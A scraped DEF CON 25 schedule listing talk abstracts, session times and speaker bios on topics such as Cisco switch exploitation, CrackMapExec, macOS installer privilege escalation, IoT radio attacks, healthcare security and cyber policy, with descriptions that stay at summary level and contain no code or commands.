Software Defined Radio and UAV enthusiast, Pedro Cabrera has worked for more than 10 years in the main Spanish telecommunications operators, conducting security audits and pentesting in mobile and fixed networks. Besides working with the telecommunications operators, Pedro leads Open Source projects such as intrusion detection systems for GSM networks, which has led him to study the various fake 2G cell attacks and existing solutions. He has also collaborated on press articles on this topic, wardriving around Madrid looking for how many fake stations can be found just walking, and where. During this year he has participated in security events, delivering the training "Attacking 2G/3G Mobile Networks, Smartphones and Apps" (BlackHat Asia), demonstrating how to remotely inject commands into commercial drones in "All your bebop drones still belong to us: drone hijacking" (RootedCon), and showing how to intercept 2G calls and SMS on a frequency-hopping network using low-cost SDR (HackRF and BladeRF).



SEV - Emperors BR II - Saturday - 19:15-20:05



Saturday July 29 7:15PM 50 mins
Change Agents: How to Effectively Influence Intractable Corporate Cultures
It’s no secret that trying to change corporate culture is hard. This is primarily due to the fact that large corporations are complex systems and fundamentally averse to change. This reluctance is rooted in a systematic misalignment of shared vision, shared values, and shared culture within the organization. This talk defines a new method of business transformation by illustrating how to effectively influence corporate cultures towards collective action. To achieve that end, we outline an iterative framework along three main vectors: assess the people and environment, craft a narrative, then utilize timing to deliver your message for maximum impact. If you have ever been frustrated by a lack of political will within your own organization, come and join us. You will learn how to become a change agent yourself, how to create other change agents, then finally how to transform your corporation into a change agent.

Keith Conway: @algirhythm
Cameron Craig:

Keith Conway:
Keith Conway is a strategist and consultant operating at the nexus of user experience, systems thinking, and business development. Keith has worked with some of the world’s largest brands including Macy’s, CA Technologies, Estee Lauder, Coca-Cola, Facebook, Spotify, Nissan, and Google to name a few. Keith’s career focus aims to architect win/win situations that create sustainable value for businesses while designing memorable experiences for customers. In his free time, Keith enjoys studying cycles and patterns found in nature, complexity theory, group dynamics, and macroeconomics. Occasionally, you will hear him talking about the monolith.

Cameron Craig:
Cameron Craig is a twenty-year contributor to new product development and interactive digital media practices, holding strategic roles in high technology start-ups, digital agencies, and most recently a Fortune 500 retailer. Cameron is currently VP – Head of User Experience/Innovation at Macy’s | Bloomingdales, where he leads the team researching, designing and dreaming up the company’s next generation products and services. Prior to Macy’s, Cam was a Partner and Managing Director of Strategy, at Sprout Designs a product design agency in San Francisco. Sprout’s clients include GoPro, The Bill and Melinda Gates Foundation, Intuit, Sony, BEA, Sun Microsystems/Oracle, The San Francisco SPCA, and DocuSign.



SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 17:00-17:59


Title:
Child Abuse Material, Current Issues Trends & Technologies

1700 Friday
@h0tdish and @mickmoran
Child Abuse Material, Current Issues Trends & Technologies

The Skytalk will be very specifically about updating the information security/hacker community on contemporary issues, trends and technologies related to Child Abuse Material (CAM) online, by Laura Friend, investigator, research analyst and Cyber-Criminologist, and Mick Moran, formerly of INTERPOL.
We would like to introduce the term "Child Abuse Material" into the hacker/infosec vernacular instead of "Child Pornography", and go into detail about why this and other current issues are valuable information for front-line information security professionals.
We wish to engage in a Q&A discussion at the end about current technologies used by INTERPOL.
This will be a unique opportunity for the information security/hacker community to ask questions directly of a Criminologist with years of OSINT experience tracking violent crimes and a former INTERPOL Child Abuse Material investigator.


DEFCON - Track 1 - Friday - 17:00-17:45


Cisco Catalyst Exploitation

Friday at 17:00 in 101 Track

45 minutes | Demo

Artem Kondratenko Penetration Tester, Security Researcher

On March 17th, Cisco Systems Inc. made a public announcement that over 300 of the switches it manufactures are prone to a critical vulnerability that allows a potential attacker to take full control of the network equipment.

This damaging public announcement was preceded by Wikileaks' publication of documents codenamed "Vault 7", which contained information on vulnerabilities and descriptions of tools needed to access phones, network equipment and even IoT devices.

Cisco Systems Inc. had a huge task in front of them: patching this vast number of different switch models is not easy. A workaround for this vulnerability was available with the initial advisory, and patched versions of the IOS software were announced on May 8th 2017.

We have all heard about modern exploit mitigation techniques such as Data Execution Prevention and Address Space Layout Randomization. But just how hardened is network equipment? And how hard is it to find critical vulnerabilities?

To answer that question I decided to reproduce the steps necessary to create a fully working tool to get remote code execution on Cisco switches mentioned in the public announcement.

This presentation is a detailed write-up of the exploit development process for the vulnerability in Cisco Cluster Management Protocol that allows a full takeover of the device.

Artem Kondratenko
Artem is a Penetration Tester at Kaspersky Lab. In the time between red team engagements he does security research on software and hardware appliances. Author of multiple CVEs on VMware virtualization platforms (CVE-2016-5331, CVE-2016-7458, CVE-2016-7459, CVE-2016-7460). Enjoys contributing to the community by writing penetration testing tools such as Invoke-Vnc (PowerShell VNC injector, part of CrackMapExec) and Rpivot (reverse SOCKS4 proxy, now part of the BlackArch Linux distro).

@artkond, https://github.com/artkond,
https://artkond.com



DEFCON - Track 1 - Friday - 12:00-12:45


CITL and the Digital Standard - A Year Later

Friday at 12:00 in 101 Track

45 minutes | Art of Defense

Sarah Zatko Chief Scientist, Cyber ITL

A year ago, Mudge and I introduced the non-profit Cyber ITL at DEF CON and its approach to automated software safety analysis. Now, we'll be covering highlights from the past year's research findings, including our in-depth analysis of several different operating systems, browsers, and IoT products.

Parts of our methodologies have now been adopted by Consumer Reports and rolled into their Digital Standard for evaluating safety, security, and privacy, in a range of consumer devices. The standard defines important consumer values that must be addressed in product development, with the goal of enabling consumer organizations to test, evaluate, and report on whether new products protect consumer security, safety, and privacy.

Sarah Zatko
Sarah Zatko is the Chief Scientist at the Cyber Independent Testing Lab (CITL), where she develops testing protocols to assess the security and risk profile of commercial software. She also works on developing automated reporting mechanisms to make such information understandable and accessible to a variety of software consumers. The CITL is a non-profit organization dedicated to empowering consumers to understand risk in software products. Sarah has degrees in Math and Computer Science from MIT and Boston University. Prior to her position at CITL, she worked as a computer security professional in the public and private sector.

cyber-itl.org



VMHV - Roman 1, Promenade Level - Friday - 15:00-15:45


Title:
Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why can't we vote on touch screens or online?


Joe Hall bio
Joseph Hall, Chief Technologist and Director of the Internet Architecture project at the Center for Democracy & Technology

Joseph Lorenzo Hall is the Chief Technologist and Director of the Internet Architecture project at the Center for Democracy & Technology, a Washington, DC-based non-profit advocacy organization dedicated to ensuring the internet remains open, innovative and free. Hall's work focuses on the intersection of technology, law, and policy, working to ensure that technical considerations are appropriately embedded into legal and policy instruments. Supporting work across all of CDT's programmatic areas, Hall provides substantive technical expertise to CDT's programs, and interfaces externally with CDT supporters, stakeholders, academics, and technologists. Hall leads CDT's Internet Architecture project, which focuses on embedding human rights values into core internet standards and infrastructure, engaging technologists in policy work, and producing accessible technical material for policymakers.


BHV - Pisa Room - Friday - 15:00-15:29


Title: Computational Chemistry on a Budget

Speakers: Mr. Br!ml3y

About Mr. Br!ml3y:
Mr_Br!ml3y is a DefCon Biohacking Village regular who is currently working on a PhD at a research university in the Midwest. He also works in public sector network security to keep the lights on. His current research focuses on developing 3D computer models for contaminant transport in groundwater, with special emphasis on ionic contaminants (alkali metals and earths, halides). He has been exploring computational chemistry and nanochemistry to help with model development, and bioinformatics as a side interest.

Abstract:
Determining effectiveness and fit of chemical compounds for human medical and health is a time-consuming and expensive process. One method for reducing time and expense is the use of computational chemistry to model compound-receptor binding, which helps rule out unpromising or suboptimal compounds. This presentation explores the fundamentals of computational chemistry for various applications and open-source programs available for use. Ab initio molecular modeling, molecular docking, and bioinformatics programs are discussed.




DEFCON - Track 1 - Friday - 13:00-13:45


Controlling IoT devices with crafted radio signals

Friday at 13:00 in 101 Track

45 minutes | Demo, Tool

Caleb Madrigal Hacker, FireEye/Mandiant

In this talk, we'll be exploring how wireless communication works. We'll capture digital data live (with Software-Defined Radio), and see how the actual bits are transmitted. From here, we'll see how to view, listen to, manipulate, and replay wireless signals. We'll also look at interrupting wireless communication, and finally, we'll even generate new radio waves from scratch (which can be useful for fuzzing and brute force attacks). I'll also be demoing some brand new tools I've written to help in the interception, manipulation, and generation of digital wireless signals with SDR.

Caleb Madrigal
Caleb Madrigal is a programmer who enjoys hacking and mathing. He is currently working as a senior software engineer on Incident Response software at Mandiant/FireEye. Most of his recent work has been in Python, Jupyter, Javascript, and C. Caleb has been into security for a while... in high school, he wrote his own (bad) cryptography and steganography software. In college, he did a good bit of "informal pen testing". Recently, Caleb has been playing around with SDR, IoT hacking, packet crafting, and a good bit of math/probability/AI/ML.

@caleb_madrigal, calebmadrigal.com



CPV - Florentine Ballroom 4 - Saturday - 15:30-16:00


Title:
Core Illumination: Traffic Analysis in Cyberspace

Author:
Kenneth Geers (Senior Research Scientist, Comodo)

Abstract:
The information security discipline devotes immense resources to developing and protecting a core set of protocols that encode and encrypt Internet communications. However, since the dawn of human conflict, simple Traffic Analysis (TA) has been used to circumvent innumerable security schemes. TA leverages metadata and hard-to-conceal network flow data related to the source, destination, size, frequency, and direction of information, from which eavesdroppers can often deduce a comprehensive intelligence analysis. TA is effective in both the hard and soft sciences, and provides an edge in economic, political, intelligence, and military affairs. Today, modern information technology, including the ubiquity of computers, and the interconnected nature of cyberspace, has made TA a global and universally accessible discipline. Further, due to privacy issues, it is also a global concern. Digital metadata, affordable computer storage, and automated information processing now record and analyse nearly all human activities, and the scrutiny is growing more acute by the day. Corporate, law enforcement, and intelligence agencies have access to strategic datasets from which they can drill down to the tactical level at any moment. This paper discusses the nature of TA, how it has evolved in the Internet era, and demonstrates the power of high-level analysis based on a large cybersecurity dataset.

Bio:
Kenneth Geers (PhD, CISSP) is a Comodo Senior Research Scientist based in Toronto, Canada. Dr. Geers is also a NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) Ambassador, a Non-Resident Senior Fellow at the Atlantic Council, an Affiliate with the Digital Society Institute-Berlin, a member of the Transatlantic Cyber Forum, and a Visiting Professor at Taras Shevchenko National University of Kyiv in Ukraine. Kenneth spent 20 years in the U.S. Government, with time in the U.S. Army, at NSA, NCIS, and NATO, and was a Senior Global Threat Analyst at FireEye. He is the author of Strategic Cyber Security, Editor of Cyber War in Perspective: Russian Aggression against Ukraine, Editor of The Virtual Battlefield: Perspectives on Cyber Warfare, Technical Expert to the Tallinn Manual, and author of many articles and chapters on cyber security.
Twitter handle of presenter(s): @KennethGeers


Demolabs - Table 3 - Saturday - 14:00-15:50


CrackMapExec

Marcello Salvati

Saturday from 1400-1550 at Table Three

Audience: Network Defense and Offense

Ever needed to pentest a network with 10 gazillion hosts in a very limited time frame? Ever wanted to Mimikatz entire subnets? How about shelling entire subnets? How about dumping SAM hashes? Share spidering? Keeping track of all the credentials you pillaged? (The list goes on!) And doing all of this in the stealthiest way possible? Well look no further than CrackMapExec! CrackMapExec (a.k.a. CME) is a modular post-exploitation tool written in Python that helps automate assessing the security of *large* Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality, allowing it to evade most endpoint protection, IDS and IPS solutions. Although meant to be used primarily for offensive purposes, CME can be used by blue teams as well to assess account privileges, find misconfigurations and simulate attack scenarios. In this demo the author will be showing off v4.0, a major update to the tool bringing more features and capabilities than ever before! If you are interested in the latest and greatest Active Directory attacks/techniques, weaponizing them at scale and general cool AD stuff, this is the demo for you!

https://github.com/byt3bl33d3r/CrackMapExec

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a security consultant who's really good at writing bios. He's so good at writing bios that he was awarded the "The Best Bio Ever from *insert date when bios became a thing* to 2017" award. (Totally legit award. Don't Google it, Bing it).

His boss Liz asked him about ten times to re-write his bio because "It was too good. He had to make it less good. We didn't want people to cry in shame when they read it. It was like a poem ... sniff.. *a single tear is shed*".

By day a security consultant, by night a tool developer who discovered a novel technique to turn tea, sushi and dank memes into somewhat functioning code he has recently devoted his attention to the wonderful rabbit hole that is Active Directory which has become his favorite thing to 0wn.



BHV - Pisa Room - Friday - 17:00-17:29


Title: Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science

Speakers: David Bach

About David:
David Bach, MD
Founder and President, Platypus Institute
A Harvard-trained scientist, physician, and serial entrepreneur, Dr. Bach is the Founder and President of the Platypus Institute, an applied neuroscience research organization whose mission is to translate cutting-edge neuroscience discoveries into practical tools and programs that radically enhance the human experience. As an entrepreneur, Dr. Bach founded and built three healthcare technology companies, each of which became a $100M enterprise. He has also been a management consultant, a venture capitalist, a competitive martial artist and a professional cellist. He is also an avid biohacker.

Abstract:
During the past decade, a confluence of scientific breakthroughs in neuroimaging, biotechnology, cybernetics, sensor technology and data analytics has created a new tool in the self-improvement arsenal. Today, for the first time in history, we can “rewire” the human brain in highly targeted ways that dramatically enhance cognition, perception, creative ability, learning speeds and health. During this session, building largely on work from DARPA, we will explore emerging technologies you can use today to dramatically enhance your brain and your cognitive abilities. We will also take a look into the future of neurotech – and how it is going to fundamentally disrupt what it means to be human.




SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 12:00-12:59


Title:
Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border

1200 Saturday
wendy
@wendyck

For many people, crossing a border isn't a cause for concern. But with a recent uptick in device searches and requests for social media handles, a lot of bad advice has been circulating. Hear from a hacker lawyer about the legality of border searches: what can border agents ask you? Must you unlock a phone? Can you give a fake social media handle?


Demolabs - Table 4 - Saturday - 14:00-15:50


Crypt-Keeper

Maurice Carey

Saturday from 1400-1550 at Table Four

Audience: Anyone who wants to run a service to securely exchange files.

Crypt-Keeper is a service for securely exchanging files.

Equipment Requirements (Network Needs, Displays, etc): A display or projector would be great. The app will be running on AWS, so a network connection will be needed as well.

https://github.com/mauricecarey/crypt-keeper

Maurice Carey
Maurice is the Principal Software Engineer at TargetSmart, a small company focused on big data problems, where he is helping create and scale their customer-facing software platform for future business growth. Previously, Maurice has worked as a Software Architect focusing on data analytics and micro-services, and as a software engineer at companies like General Motors and Amazon.com.

Maurice has been a speaker or presenter publicly at many local meet ups and small conferences, as well as presenting papers at the IEEE International Conference on Program Comprehension (ICPC), and IEEE Enterprise Distributed Object Computing (EDOC) conferences.

Maurice received a Bachelor's Degree in Computer Science and a PhD in Computer Science from Arizona State University while establishing himself as an entrepreneur, working his way through school writing code for various clients.



CPV - Florentine Ballroom 4 - Friday - 16:30-17:30


Title:
Cryptanalysis in the Time of Ransomware

Author:
Mark Mager (Endgame)

Abstract:
Crypto has served an important role in securing sensitive data throughout the years, but ransomware has flipped this script on its head by leveraging crypto as a means to instead prevent users from accessing their own data. The crypto seen in ransomware covers a wide range of complexity of symmetric and asymmetric algorithms, but flaws in their implementation and key storage / transmission routines have left the door open for users to retrieve their data in certain cases. In this talk, I'll provide a glimpse into some of the more notable ransomware crypto implementations that have surfaced over the past few years and how their weaknesses were exploited by security researchers through reverse engineering and cryptanalysis.

Bio:
Mark is a Senior Malware Researcher for Endgame. Throughout his career in software engineering and computer security, he has served in prominent technical leadership roles in the research and development of advanced computer network operations tools and has provided malware analysis and reverse engineering subject matter expertise to a diverse range of government and commercial clients in the Washington, D.C. metropolitan area.
Twitter handle of presenter(s): @magerbomb
Website of presenter(s) or content: https://www.endgame.com/our-experts/mark-mager


PHV - Milano VIII - Promenade Level - Friday - 13:10-13:59


CVE IDs and How to Get Them

Daniel Adinolfi, Lead Cybersecurity Engineer at The MITRE Corporation
Anthony Singleton, Cyber Security Engineer at The MITRE Corporation

The Common Vulnerabilities and Exposures (CVE) program uniquely identifies and names publicly-disclosed vulnerabilities in software and other codebases. Whether you are a vulnerability researcher, a vendor, or a project maintainer, it has never been easier to have CVE IDs assigned to vulnerabilities you are disclosing or coordinating around. This presentation will be an opportunity to find out how to participate as well as a chance to offer your thoughts, questions, or feedback about CVE. Attendees will learn what is considered a vulnerability for CVE, how to assign CVE IDs to vulnerabilities, how to describe those vulnerabilities within CVE ID entries, how to submit those assignments, and where to get more information about CVE assignment.

Daniel Adinolfi (Twitter: @pkdan14850) is a Lead Cybersecurity Engineer at The MITRE Corporation. He works as part of the CVE Program as the CVE Numbering Authority (CNA) Coordinator and the Communications Lead. Daniel has a background in security operations and incident response and in developing information sharing programs, compliance programs, and security architectures. Daniel also writes poetry, plays games, and drinks a lot of coffee. He works in cybersecurity to pay the bills. Most of those bills are coffee and game-related.

Anthony Singleton recently completed his MS in Information Security and Policy Management at Carnegie Mellon University. He has worked for CERT-CC interning as a Cyber Workforce Developer and Vulnerability Analyst and is currently working at MITRE Corporation as a Cybersecurity Engineer with a focus in both the CVE and CWE efforts. Anthony is an aspiring Hacker working towards acquiring both the OSCP certificate and CEH certificate. He is a major New England Patriots fan and enjoys working on his Jeep Wrangler in his downtime.



CPV - Florentine Ballroom 4 - Sunday - 11:30-12:00


Title:
Cypherpunks History

Author:
Ryan Lackey (ResetSecurity, Inc.)

Abstract:
We will go over the history of the 1990s cypherpunks and major topics discussed during that period -- including remailers, the first discussions of crypto currencies, and various forms of anonymous electronic markets. In addition, we will present a free archive of the mailing list and topics for future research.

Bio:
Ryan Lackey has been a cypherpunk for over 20 years. He founded the world's first offshore datahaven, HavenCo, on Sealand in 2000. He was involved with pre-cryptocurrency anonymous digital currencies backed with gold and other assets, and worked in Iraq, Afghanistan, and other conflict zones, bootstrapping a satellite and wireless communications company. Later, he founded a Y Combinator-backed startup, CryptoSeal, which he sold to Cloudflare in 2014. After working at Cloudflare for the following two years, he founded ResetSecurity, a travel security company, in 2016.
Twitter handle of presenter(s): @octal


DEFCON - Modena Room - Saturday - 20:00-21:59


D0 No H4RM: A Healthcare Security Conversation

Saturday at 20:00 - 22:00 in Modena Room

Evening Lounge

Christian "quaddi" Dameff MD MS Hacker

Jeff "r3plicant" Tully MD Hacker

Beau Woods Deputy director of the Cyber Statecraft Initiative in the Brent Scowcroft on International Security

Joshua Corman Director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center

Michael C. McNeil Privacy and security expert, Philips Healthcare

Jay Radcliffe Senior Security Consultant and Researcher, Rapid7

Suzanne Schwartz, MD, MBA Associate Director for Science & Strategic Partnerships, FDA's Center for Devices & Radiological Health (CDRH)

Previously a free-flowing, fast moving conversation between old friends and new colleagues in a dimly lit and alcohol soaked off-strip hotel suite, the third annual edition of "D0 No H4rm" moves to the better lit and even more alcohol soaked auspices of the DEF CON 25 Evening Lounge for a two hour session that links makers, breakers, and wonks in the healthcare space for a continuation of what may be one of the most important conversations in all of hackerdom: how to ensure the safety and security of patients in a system more connected and vulnerable than ever before. Join physician researchers quaddi and r3plicant, and researcher turned wonk Beau Woods as they offer an update on the state of the field and curate an interactive and engaging panel before breaking out the bottle and getting social. Continuing a tradition that has sparked professional connections, project ideas, and enduring friendships, "D0 No H4rm" aims to offer a prescription for the future, and we want your voice to be heard.

Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics include hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.

@cdameffMD

Jeff "r3plicant" Tully MD
Jeff Tully is an anesthesiologist, pediatrician, and researcher with an interest in understanding the ever-growing intersections between health care and technology. Prior to medical school he worked on "hacking" the genetic code of Salmonella bacteria to create anti-cancer tools, and throughout medical training has remained involved in the conversations and projects that will secure healthcare and protect our patients as we face a brave new world of remote care, implantable medical devices, and biohacking.

@jefftullymd

Beau Woods
Beau Woods is the deputy director of the Cyber Statecraft Initiative in the Brent Scowcroft on International Security. His focus is the intersection of cyber (yes, he'll drink for that) security and the human condition, primarily around Cyber Safety. This comes out of the I Am The Cavalry initiative, ensuring the connected technology that can impact life and safety is worthy of our trust. Beau started his career working at a regional health provider, protecting patients by defending medical data and devices.

@beauwoods

Joshua Corman
Joshua Corman is the director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center and a founder of I am The Cavalry (dot org). Corman previously served as CTO for Sonatype, director of security intelligence for Akamai, and in senior research and strategy roles for The 451 Group and IBM Internet Security Systems. He co-founded @RuggedSoftware and @IamTheCavalry to encourage new security approaches in response to the world's increasing dependence on digital infrastructure. Josh's unique approach to security in the context of human factors, adversary motivations, and social impact has helped position him as one of the most trusted names in security. He also serves as adjunct faculty for Carnegie Mellon's Heinz College and on the 2016 HHS Cybersecurity Task Force.



BHV - Pisa Room - Saturday - 14:00-14:59


Title: Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode

Speaker: Awesome Folks from Various BioHacking Podcasts

Moderators: c00p3r and cur50r from Dangerous Minds Podcast; McStuff from 2 Cyborgs and a Microphone; Sciaticnerd from Security Endeavours.

Abstract:
For this panel, two of the hosts of “Dangerous Minds Podcast” will be joined by one of the hosts of “Two Cyborgs and a Microphone” and by Sciaticnerd from "Security Endeavours" to record a normal episode with a mystery guest or guests, celebrating the 100th episode of DMP and our first live recording. Join us for the learning, stay for the laughs (without editing out our goofs), and turn the tables on everyone by asking your own questions as well, so we can all learn together. It’s going to be a little bit of fun, a little bit of learning, and a lot of laughs as always. Come out and join us, and bring your own spark! And perhaps go away with more.




DEFCON - Track 3 - Friday - 15:00-15:45


Dark Data

Friday at 15:00 in Track 3

45 minutes

Svea Eckert NDR

Andreas Dewes PhD

A judge with preferences for hard core porn, a police officer investigating a cyber-crime, a politician ordering burn out medication - this kind of very personal and private information is on the market. It gets sold to whoever is willing to pay for it.

In a long-term experiment, with the help of some social engineering techniques, we were able to get our hands on the most private data you can find on the internet: clickstream data of three million German citizens. It contains every URL they have looked at, every second, every hour, every day for 31 days. In our talk we will not only show how we got that data, but how you can de-anonymize it with some simple techniques.

This data is collected worldwide by big companies, whose legal purpose is to sell analytics and insights for marketers and businesses. In the shadow of Google and Facebook, companies have evolved, their names unknown to a broader public but making billions of dollars with your data. The new oil of the 20th century.

Our experiment shows in a drastic way what the recent decision reversing the Broadband Privacy Rule means, what the consequences for everyday life could be when ISPs are allowed to sell your browsing data, and why that piece of regulation from the FCC was so important regarding privacy and constitutional rights.

Svea Eckert
Svea Eckert works as a freelance journalist for Germany's main public service broadcaster "Das Erste" (ARD). She is researching and reporting investigative issues for the PrimeTime news shows and high quality documentaries. Her main focus lies on new technology: computer and network security, digital economics and data protection.

Bigger projects and documentaries are for example "Superpower Wikileaks?" (ARD), "Facebook - Billion Dollar Business friendship" (ARD), her first book "Monitored and spied out: Prism, NSA, Facebook & Co" and in 2015 "Netwars" (ARD). Svea Eckert studied "Journalism and Communications" and Economics in Hamburg. She completed her journalistic training at NDR, Hamburg and Hannover.

Twitter: @sveckert
Website: www.sveaeckert.de

Andreas Dewes
Andreas Dewes is a trained physicist with a PhD in experimental quantum computing and a degree in quantitative economics. He has a passion for data analysis and software development. He has received numerous awards for his work on data analysis and his work on data privacy and big data has been featured in the national and international press.

Twitter: @japh44
Github: adewes



DEFCON - Capri Room - Saturday - 15:00-16:59


DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd

Saturday at 15:00 - 17:00 in Capri Room

Lounge Format

Representative James Langevin (D-RI)

Representative Will Hurd (R-TX)

Ever wondered if there was such a thing as a “hacker-friendly” member of Congress? We found some and convinced them to come to DEF CON so you can meet them too! In this first-of-its-kind DEF CON session, two of the most hacker-friendly Congress critters will join DEF CON for an engaging and interactive session with the security research community.

Join the Atlantic Council’s Cyber Statecraft Initiative for a candid discussion with Representatives Will Hurd (R-TX) and James Langevin (D-RI). The two Congressmen will share their thoughts on the latest developments in cybersecurity policymaking on the Hill and provide a unique opportunity for the audience to ask questions, exchange ideas, and maybe even answer some of the Congressmen’s questions.

Rep. Will Hurd (R-TX)
Rep Hurd was born and raised in San Antonio, Texas. He attended John Marshall High School and Texas A&M University, where he majored in Computer Science and served as Student Body President.

After college, Will served as an undercover officer in the CIA in the Middle East and South Asia for nearly a decade, collecting intelligence that influenced the National Security agenda. Upon leaving the CIA, he became a Senior Advisor with a cybersecurity firm, covering a wide range of complex challenges faced by manufacturers, financial institutions, retailers, and critical infrastructure owners. He was also a partner with a strategic advisory firm helping businesses expand into international markets.

In 2015, Will was elected to the 114th Congress and currently serves on the Committee of Oversight and Government Reform and chairs the Information Technology Subcommittee. He also sits on the Committee on Homeland Security and is the Vice Chair of the Border and Maritime Security Subcommittee. In 2017, Will was appointed by Speaker Ryan to serve on the House Permanent Select Intelligence Committee, to replace Representative Mike Pompeo upon his confirmation as Director of the CIA.

Rep. James Langevin (D-RI)
Rep. Langevin first ran for office in 1986, when he was elected a Delegate to Rhode Island’s Constitutional Convention and served as its secretary. Two years later, he won election to the Rhode Island House of Representatives.

In 1994, Langevin defeated a Republican incumbent to become the nation’s youngest Secretary of State. He transformed the office into “the people’s partner in government” and took on the challenge of reforming Rhode Island’s outdated election system. Langevin also established the state’s Public Information Center and, with Brown University, published “Access Denied,” which examined the General Assembly’s compliance with the Open Meetings Law and documented routine and widespread violations.

In 1998, Langevin easily won re-election to his second term as Secretary of State, achieving the largest plurality of any general officer in this century, and in 2000, he made a successful run for the U.S. House of Representatives, where he has served the Second Congressional District ever since.

Langevin graduated from Rhode Island College and earned a Master’s Degree in Public Administration from the Kennedy School of Government at Harvard University. He resides in Warwick, Rhode Island.



DEFCON - Track 1 - Sunday - 15:00-14:59


DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd

Sunday at 15:00 in 101 Track

Representative James Langevin (D-RI)

Representative Will Hurd (R-TX)

Joshua Corman Director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center

The past year has seen major disruptions at the intersection of security and society. “Cybersecurity” has been thrust into the public consciousness frighteningly widely and quickly. Issues of public policy impact our colleagues and our community, beyond the technology layer. Some in the public policy community are actively encouraging our community to engage, recognizing the need for a technically literate voice of reason from the security research community. DEF CON is proud to host two members of Congress, who braved their way from DC to DEF CON as ambassadors from their community to ours.

Joshua Corman will engage Rep. Jim Langevin (D-RI) and Rep. Will Hurd (R-TX), in a candid, on-the-record “fireside chat” style conversation. DEF CON attendees will hear their perspectives on the state of cyber policy and what can be done to improve technical literacy in the dialogs. The members will also reflect on their experience at DEF CON, hanging out with hackers, and how they can make their voice known in the public policy conversation.

Rep. Will Hurd (R-TX)
Rep Hurd was born and raised in San Antonio, Texas. He attended John Marshall High School and Texas A&M University, where he majored in Computer Science and served as Student Body President.

After college, Will served as an undercover officer in the CIA in the Middle East and South Asia for nearly a decade, collecting intelligence that influenced the National Security agenda. Upon leaving the CIA, he became a Senior Advisor with a cybersecurity firm, covering a wide range of complex challenges faced by manufacturers, financial institutions, retailers, and critical infrastructure owners. He was also a partner with a strategic advisory firm helping businesses expand into international markets.

In 2015, Will was elected to the 114th Congress and currently serves on the Committee of Oversight and Government Reform and chairs the Information Technology Subcommittee. He also sits on the Committee on Homeland Security and is the Vice Chair of the Border and Maritime Security Subcommittee. In 2017, Will was appointed by Speaker Ryan to serve on the House Permanent Select Intelligence Committee, to replace Representative Mike Pompeo upon his confirmation as Director of the CIA.

Rep. James Langevin (D-RI)
Rep. Langevin first ran for office in 1986, when he was elected a Delegate to Rhode Island’s Constitutional Convention and served as its secretary. Two years later, he won election to the Rhode Island House of Representatives.

In 1994, Langevin defeated a Republican incumbent to become the nation’s youngest Secretary of State. He transformed the office into “the people’s partner in government” and took on the challenge of reforming Rhode Island’s outdated election system. Langevin also established the state’s Public Information Center and, with Brown University, published “Access Denied,” which examined the General Assembly’s compliance with the Open Meetings Law and documented routine and widespread violations.

In 1998, Langevin easily won re-election to his second term as Secretary of State, achieving the largest plurality of any general officer in this century, and in 2000, he made a successful run for the U.S. House of Representatives, where he has served the Second Congressional District ever since.

Langevin graduated from Rhode Island College and earned a Master’s Degree in Public Administration from the Kennedy School of Government at Harvard University. He resides in Warwick, Rhode Island.



DEFCON - Track 1 - Saturday - 16:00-16:45


Dealing the perfect hand - Shuffling memory blocks on z/OS

Saturday at 16:00 in 101 Track

45 minutes | Demo, Tool

Ayoul3 Pentester, Wavestone

Follow me on a journey where we p0wn one of the most secure platforms on earth. A giant mammoth that still powers the most critical business functions around the world: The Mainframe! Be it a wire transfer, an ATM withdrawal, or a flight booking, you can be sure that you've used the trusted services of a Mainframe at least once during the last 24 hours. In this talk, I will present methods of privilege escalation on IBM z/OS: How to leverage a simple access to achieve total control over the machine and impersonate other users. If you are interested in mainframes or merely curious to see what a shell looks like on MVS, you're welcome to tag along.

Ayoul3
Ayoub is a pentester working for Wavestone, a consulting firm based in France. He got interested in Mainframe security in 2014 when, during an audit, he noticed the big security gap between this platform and standard systems like Windows and Unix. A gap that makes little sense since z/OS has been around for a while and is used by most major companies to perform critical business operations: wire transfer, claim refunds, bookings, etc.

If you want to test some of the tools showcased during the talk, you can check out his tools: https://github.com/ayoul3/

@ayoul3__



DEFCON - Track 2 - Friday - 14:00-14:45


Death By 1000 Installers; on macOS, it's all broken!

Friday at 14:00 in Track 2

45 minutes | Demo, Exploit

Patrick Wardle Chief Security Researcher, Synack

Ever get an uneasy feeling when an installer asks for your password? Well, your gut was right! The majority of macOS installers & updaters are vulnerable to a wide range of priv-esc attacks.

It began with the discovery that Apple's OS updater could be abused to bypass SIP (CVE-2017-6974). Next, turns out Apple's core installer app may be subverted to load unsigned dylibs which may elevate privileges to root.

And what about 3rd-party installers? I looked at what's installed on my Mac, and ahhh, so many bugs!

- Firewall, Little Snitch: EoP via race condition of insecure plist
- Anti-Virus, Sophos: EoP via hijack of binary component
- Browser, Google Chrome: EoP via script hijack
- Virtualization, VMWare Fusion: EoP via race condition of insecure script
- IoT, DropCam: EoP via hijack of binary component
- and more!

...and 3rd-party auto-update frameworks like Sparkle -yup vulnerable too!

Though root is great, we can't bypass SIP nor load unsigned kexts. However with root, I discovered one could now trigger a ring-0 heap-overflow that provides complete system control.

Though the talk will discuss a variety of discovery mechanisms, 0days, and macOS exploitation techniques, it won't be all doom & gloom. We'll end by discussing ways to perform authorized installs/upgrades that don't undermine system security.

Patrick Wardle
